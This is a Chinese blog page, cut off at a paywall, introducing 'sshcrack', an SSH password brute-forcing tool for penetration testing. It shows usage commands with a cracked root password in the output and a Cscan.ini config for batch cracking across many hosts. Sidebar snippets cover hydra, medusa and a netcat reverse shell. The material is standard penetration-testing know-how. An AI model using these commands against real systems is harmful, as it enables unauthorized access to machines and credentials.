[原创]内网SSH密码爆破工具sshcrack(配合Cscan批量弱口令检测)

最新推荐文章于 2025-03-20 11:02:41 发布
最新推荐文章于 2025-03-20 11:02:41 发布
阅读量2.4k 收藏 8
点赞数 1
文章标签: 运维 操作系统 python
原文链接:http://www.cnblogs.com/k8gege/p/10995625.html
版权
本文介绍了sshcrack,一个用于内网和外网SSH密码爆破的工具,配合Cscan进行批量弱口令检测。内容包括sshcrack的用法、批量检测、执行命令、源码解析以及Linux批量上控的教程,同时探讨了Python程序的跨平台问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x000 前言

sshcrack是一个命令行下的SSH密码爆破工具,适用于内渗中SSH密码检测

当然也可用于外网SSH密码爆破,支持Windows/Linux,其它系统未测。Tip1

0x001 目录

1.sshcrack用法

2.Cscan批量扫描

3.连接SSH执行命令

4.sshcrack源码

5.SSH批量上控

6.工具下载

0x002 用法

指定SSH服务器密码检测

弱口令检测 (-crack 用户密码可随便写,因为帐密列表已写死)
C:\Users\K8team\Desktop\upload>sshcrack.exe 192.168.1.106 22 root k8gege -crack
192.168.1.106 22 root toor LoginOK

单密码验证 (-test )
C:\Users\K8team\Desktop\upload>sshcrack.exe 192.168.1.106 22 root toor -test
192.168.1.106 22 root toor LoginOK

 

0x003 批量SSH服务器密码检测

0.将Cscan.exe Cscan.ini sshcrack.exe放置同一目录

Cscan.ini内容如下

1.爆破弱口令(当前无密码或已获取多个帐密)

[Cscan]
exe=sshcrack.exe
arg=$ip$ 22 "" "" -crack

2.验证一个已知密码(快速检测内网其它机器是否使用同一帐密)

[Cscan]
exe=sshcr
最低0.47元/天 解锁文章
[原创]Ladon7.5大型内网渗透扫描器&Cobalt Strike
K8哥哥
11-10 1万+
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据
Ladon for Kali 2019
K8哥哥
12-15 2077
前言 无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。 但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。 漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞? 对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。 因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模...
ssh爆破工具hydra.zip
04-27
ssh爆破工具hydra.zip
Shreder:线程SSH协议密码爆破工具
weixin_43977912的博客
10-08 1133
关于Shreder Shreder是一款功能强大的多线程SSH协议密码爆破工具,广大研究人员可以使用Shreder对SSH协议的安全性进行探究。 功能介绍 能够快速执行密码爆破,每个密码仅需1秒; 经过优化处理,支持大型密码字典,Shreder尝试1000个密码仅需1分40秒; 简单的命令行接口和API使用方法; 工具安装 由于Shreder使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装Shreder: pip3 install
【渗透测试】密码爆破工具——九头蛇(hydra)使用详解及实战,从零基础到精通,收藏这篇就够了!
最新发布
喜欢Python编程的程序员柚柚呀
03-20 749
攻击机:kali装有hydra工具靶机:192.168.154.131安装ssh服务,正常运行为了测试方便,我们创建两个简单的字典文件,如下:​。
【WEB_脚本开发】简易SSH爆破工具
HWHXY的博客
03-09 788
https://github.com/hwhxy/sshCrack
ssh crack
anzhuangguai的专栏
10-13 1287
ncrack in action ncrack comes with its own list of password dictionaries; the ‘default.pwd’ dictionary is used unless we specify another one. We will attempt to determine if the user root is allo
使用hydra进行SSH爆破
qq_53218512的博客
06-02 8015
mobaxterm 的功能非常全面,几乎提供了所有重要的远程网络工具(比如 SSH、X11、RDP、VNC、FTP、MOSH 等),以及 Windows 桌面上的 Unix 命令(bash、ls、cat、sed、grep、awk、rsync 等),登录之后默认开启 sftp 模式。命令的意思是:使用bin.bash里面的shell,用nc命令反弹shell,反弹到攻击机的7777端口,-e代表需要执行的指令,这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。
渗透测试 | 信息收集详解
Surysaki的博客
10-21 1816
可以通过插件等工具,识别网站的指纹,如网站的使用的框架Vue、使用的中间件、数据库、那些编程语言等。指纹识别出来目标资产使用了哪些框架、OA、CMS等,就可以尝试利用专项漏洞工具或者网上搜索相关漏洞从而实现快速打点目的。
【介绍两款SSH爆破工具 hydra+medusa】
热门推荐
UNITY3D游戏引擎技术专家
04-11 1万+
安装hydra wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz tar zxf hydra-6.3-src.tar.gz cd hydra-6.3-src ./configure make make install 使用hydra
SHH爆破linux工具
01-13
这个爆破工具个人用的感觉非常的不错啊 其实都不想法出来的 为了装点下载BB
多线程SSH爆破
04-23
ssh环境,通过action触发一个多线程任务,每个任务调用一个继承HibernateDaoSupport的service的方法,现在要每个线程都绑定一个新的hibernate session
Kali下ssh爆破以及nikto工具漏洞扫描-漏洞银行大咖周3 -屌丝绅士
01-26
来源:漏洞银行大咖面对面一周大咖秀3 作者:屌丝绅士
两款SSH爆破工具的介绍:hydra+medusa
William234的博客
03-20 9723
两款SSH爆破工具的介绍:hydra+me...
使用Go语言编写一个简单的SSH爆破工具
weixin_45945976的博客
07-04 478
使用Go语言编写一个简单的SSH爆破工具,但请注意,这个工具仅供学习和合法测试使用,不要用于任何非法目的。
暴力破解ssh、ftp、telnet等工具–Medusa
收集盒 Book box
06-24 1万+
Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC的密码爆破工具。 作者网站:ht
Python脚本--爆破SSH
changmantong1045的博客
09-15 534
利用Pxssh是pexpect库的ssh专用脚本 环境:kali 代码: ''' Author:yw ''' from pexpect import pxssh import optparse from threading import * Max_Connect = 5 connection_lock = BoundedSemaphore(value=Max_Connect) def ...
python SSH暴力破解工具
05-18 130
前面写了一个关于ftp的brute force的工具,但是发现身边搞技术的越来越少用ftp进行文件传输了。大多都使用ssh了。所以这里写了一个关于ssh的brute force工具玩玩,练练手。 现在发现这个脚本有个缺陷,就是,如果你的字典很大的话速度就会比较慢,后面先...
python 实现ssh爆破
杭州七先生的个人博客
09-19 2792
python版本 :2.7.x   from ftplib import FTP wordlist = open('wordlist.txt', 'r') user_login = "ceshi" def getPassword(password): try: ftp = FTP("192.168.216.219") ftp.login(user_login,password)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值